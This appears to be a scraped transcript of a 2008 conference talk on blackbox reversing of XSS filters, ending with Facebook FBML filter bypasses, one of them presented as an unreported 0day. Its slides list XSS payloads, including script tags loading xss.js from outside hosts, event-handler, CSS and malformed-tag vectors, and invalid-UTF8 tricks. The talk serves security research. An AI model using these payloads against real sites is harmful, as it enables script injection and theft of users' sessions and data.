blackbox reversing of xss filters alexander sotirov [email protected] ekoparty 2008
Post on 19-Dec-2015
218 views
TRANSCRIPT
![Page 2: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/2.jpg)
• Web applications are the future
• Reversing web apps
○ blackbox reversing
○ very different environment and tools
• Cross-site scripting (XSS)
○ the “strcpy” of web app development
○ reversing and bypassing XSS filters
Introduction
![Page 3: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/3.jpg)
• User generated content and Web 2.0
• Implementing XSS filters
• Reversing XSS filters
• XSS in Facebook
Overview
![Page 4: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/4.jpg)
Part I
User generated contentand Web 2.0
![Page 5: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/5.jpg)
Web 2.0
• User generated content
• APIs
• Mashups
• Aggregation of untrusted content
• Significantly increased attack surface
![Page 6: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/6.jpg)
User generated content
• Text
○ Plaintext
○ Lightweight markup (BBcode, Wikipedia)
○ Limited HTML
○ Full HTML and JavaScript
• Images, sound, video
• Flash
![Page 7: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/7.jpg)
Attacker generated content
• Social networking○ Samy’s MySpace worm○ multiple Orkut worms, stealing bank info
• Webmail○ Hotmail and Yahoo Mail cross-site scripting
worm written by SkyLined in 2002○ many SquirrelMail cross-site scripting bugs
• Blogs○ hacking WordPress with XSS
![Page 8: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/8.jpg)
Cross site scripting (XSS)
Request:
http://www.example.com/?name=<script>alert('XSS')</script>
Response:
<html><body><p>Hello <script>alert('XSS')</script></p></body></html>
![Page 9: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/9.jpg)
Web security model
Same origin policy
•Prevents scripts from one domain from manipulating documents loaded from other domains
•Cross site scripting allows us to execute arbitrary scripts on a page loaded from another domain
![Page 10: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/10.jpg)
What can XSS do?
• Stealing data from web pages
• Capturing keystrokes on a web page
• Stealing authentication cookies
• Arbitrary HTTP requests with XMLHttpRequest
![Page 11: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/11.jpg)
Part II
Implementing XSS filters
![Page 12: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/12.jpg)
XSS filters
Goal:
• Remove all scripts from untrusted HTML
Challenges:
• Many HTML features that allow scripting• Proprietary extensions to HTML• Parsing invalid HTML• Browser bugs
![Page 13: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/13.jpg)
Features that allow scripting
Script tags<script src="http://www.example.com/xss.js">
Event handler attributes<body onload="alert('XSS')">
CSS<p style="background:url('javascript:alert(1)')">
URLs<img src="javascript:alert('XSS')">
![Page 14: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/14.jpg)
Proprietary extensions to HTML
XML data islands (IE)
<xml src="http://www.example.com/xss.xml" id="x"><span datasrc="#x" datafld="c" dataformatas="html">
JavaScript expressions in attribute (NS4)
<p id="&{alert('XSS')}">
Conditional comments (IE)
<!--[if gte IE 4]> <script>alert('XSS')</script><![endif]-->
![Page 15: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/15.jpg)
Parsing invalid HTML
<<scr\0ipt/src=http://xss.com/xss.js></script
○ extra '<' before opening tag○ NULL byte inside tag name○ '/' separator between tag and attribute○ no quotes around attribute value○ missing '>' in closing tag
Browser behavior is not documented or standardized. IE7 parses this as:
<script src="http://xss.com/xss.js"></script>
![Page 16: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/16.jpg)
Browser bugs
Invalid UTF8 handling in Internet Explorer 6<body foo="\xC0" bar=" onload=alert(1);//">
Firefox and IE7:<body foo="?" bar=" onload=alert(1);//">
IE6:<body foo="? bar=" onload=alert(1);//">
Attribute parsing in Firefox < 2.0.0.2<body onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
![Page 17: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/17.jpg)
Implementing XSS filters
• String matching filters
• HTML DOM parsers
• Canonicalization
• Whitelisting
![Page 18: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/18.jpg)
String matching filters
Remove all script tags:
s/<script>//g;
Bypasses:
○ Invalid HTML accepted by browsers
○ Encoding of attribute values and URLs
○ Using the filter against itself: <scr<script>ipt>
○ Incomplete blacklists
![Page 19: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/19.jpg)
HTML DOM parsers
<body onload="alert(1)"><script>alert(2)</script><p>Hello</p></body>
![Page 20: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/20.jpg)
Canonicalization
1. Build a DOM tree from the input stream○ handle invalid UTF8 sequences
2. Apply XSS filters to the DOM tree
3. Output the DOM tree in a canonical form○ escape special characters○ add closing tags where necessary
![Page 21: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/21.jpg)
Whitelisting
Blacklisting○ remove known bad tags and attributes○ must be 100% complete to be safe
Whitelisting○ allow only known safe tags and attributes○ safer than blacklisting
![Page 22: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/22.jpg)
Part III
Reversing XSS filters
![Page 23: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/23.jpg)
Reversing XSS filters
• Remote web applications○ no access to source code or binaries
• Fuzzing○ limited by bandwidth and request latency○ draws attention
• Blackbox reversing○ send input and inspect the output○ build a filter model based on its behavior
![Page 24: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/24.jpg)
Iterative model generation
1. Build an initial model of the filter
2. Generate a test case
3. Send test case and inspect the result
4. Update the model
5. Go to step 2
![Page 25: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/25.jpg)
Example of parser reversing
Test case:
(1..0xFF).each { |x| data << "<p #{x.chr}a=''></p>"}
Results:
○ whitespace regexp
[\x08\t\r\n "'/]+
○ attribute name regexp
[a-zA-Z0-9:-_]+
![Page 26: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/26.jpg)
refltr.rb
• Framework for XSS filter reversing○ run a set of tests against a web application○ store the results○ manual analysis of the output○ result diffing
• Application modules○ abstract application specific details○ sending data, result parsing, error detection
• Test modules○ test generation functions
![Page 27: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/27.jpg)
Using the model
• Grammar based analysis○ build a grammar for the filter output
○ build a grammar for the browser parser
○ find a valid sentence in both grammars that includes a <script> tag
• Reimplement the filter and fuzz it locally
![Page 28: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/28.jpg)
Part IV
XSS in Facebook
![Page 29: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/29.jpg)
Facebook platform
• Third party applications○ application pages○ content in user profiles○ message and wall post attachments
• FBML○ HTML with a few restrictions○ limited style sheet and scripting support
• FBJS○ sandboxed JavaScript
![Page 30: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/30.jpg)
FBML processing
browserbrowser apps.facebook.comapps.facebook.com funapp.example.comfunapp.example.comHTML FBML
GET /funapp/foo.html GET /foo.html
• Facebook serves as a proxy for application content
• FBML processing:○ special FBML tags are replaced with HTML○ non-supported HTML tags are removed○ scripts are sandboxed
![Page 31: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/31.jpg)
Reversing the FBML parser
apps.facebook.comapps.facebook.com
refltr.rbrefltr.rb
apacheapache
write test case in/var/www
HTML
FBML
• HTML DOM parser• Accepts and fixes invalid input• Canonicalized output• Whitelist of tags, blacklist of attributes
![Page 32: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/32.jpg)
Facebook XSS
Invalid UTF8 sequences○ input is parsed as ASCII○ HTTP response headers specify UTF8 encoding○ affects only IE6
Code:
<img src="…" foo="\xC0" bar="onload=alert(1);//">
Reported and fixed in February.
![Page 33: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/33.jpg)
This is where I drop the 0day
Attribute name parsing○ mismatch between Facebook and Firefox parsers○ affects only Firefox < 2.0.0.2
Code:
<img src="…" onload:="alert(1)">
Not reported, Facebook is still vulnerable.
![Page 34: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/34.jpg)
Facebook Demo
![Page 35: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/35.jpg)
Part V
Conclusion
![Page 36: Blackbox Reversing of XSS Filters Alexander Sotirov alex@sotirov.net ekoparty 2008](https://reader035.vdocuments.us/reader035/viewer/2022062714/56649d2b5503460f94a0051f/html5/thumbnails/36.jpg)
Conclusion
• Web 2.0 sites are totally screwed○ broken web security model○ undocumented browser behavior○ no programming language support
• Blackbox reversing○ the only way to reverse most web apps○ we need better tools and automation